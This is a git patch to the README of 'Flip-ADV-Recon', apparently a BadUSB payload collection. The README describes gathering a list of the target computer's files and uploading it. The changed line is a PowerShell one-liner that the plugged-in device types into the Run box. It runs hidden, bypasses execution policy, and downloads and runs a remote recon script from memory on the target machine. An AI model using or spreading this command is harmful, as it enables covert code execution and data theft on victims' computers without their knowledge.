From 110cc164fcd284189a2515be44182961421aa2c5 Mon Sep 17 00:00:00 2001 From: I-Am-Jakoby Date: Sat, 17 Dec 2022 01:41:47 -0600 Subject: [PATCH] Update README.md --- Payloads/Flip-ADV-Recon/README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Payloads/Flip-ADV-Recon/README.md b/Payloads/Flip-ADV-Recon/README.md index bdfa190..244c5bc 100644 --- a/Payloads/Flip-ADV-Recon/README.md +++ b/Payloads/Flip-ADV-Recon/README.md @@ -40,7 +40,7 @@ Along with TREE list of all files in the target computer is gathered and uploade * Plug in your device * Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory ``` -powershell -w h -NoP -NonI -Ep Bypass iwr https://raw.githubusercontent.com/I-Am-Jakoby/1/main/ADV-Recon.ps1 | iex +powershell -w h -NoP -NonI -Ep Bypass $db='';iwr https://raw.githubusercontent.com/I-Am-Jakoby/1/main/ADV-Recon.ps1 | iex ```

(back to top)